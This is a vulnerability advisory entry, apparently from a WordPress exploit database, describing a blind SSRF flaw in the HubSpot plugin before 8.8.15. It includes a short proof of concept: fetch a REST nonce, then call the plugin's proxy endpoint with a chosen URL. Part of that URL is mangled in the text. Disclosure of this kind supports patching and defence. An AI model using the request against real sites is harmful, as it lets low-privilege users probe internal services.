Lucene search

K
wpexploitBrandon RoldanWPEX-ID:4AD2BB96-87A4-4590-A058-B03B33D2FCEE
HistoryApr 11, 2022 - 12:00 a.m.

HubSpot < 8.8.15 - Contributor+ Blind SSRF

2022-04-1100:00:00
Brandon Roldan
82
hubspot
contributor+
blind ssrf
authenticated user
rest nonce
exploit
ssrf

EPSS

0.001

Percentile

42.9%

The plugin does not validate the proxy URL given to the proxy REST endpoint, which could allow users with the edit_posts capability (by default contributor and above) to perform SSRF attacks

As an authenticated user with the edit_posts capability, get REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

https://example.com/wp-json/leadin/v1/[email protected]&_wpnonce=8aaf916bd9

EPSS

0.001

Percentile

42.9%

Related for WPEX-ID:4AD2BB96-87A4-4590-A058-B03B33D2FCEE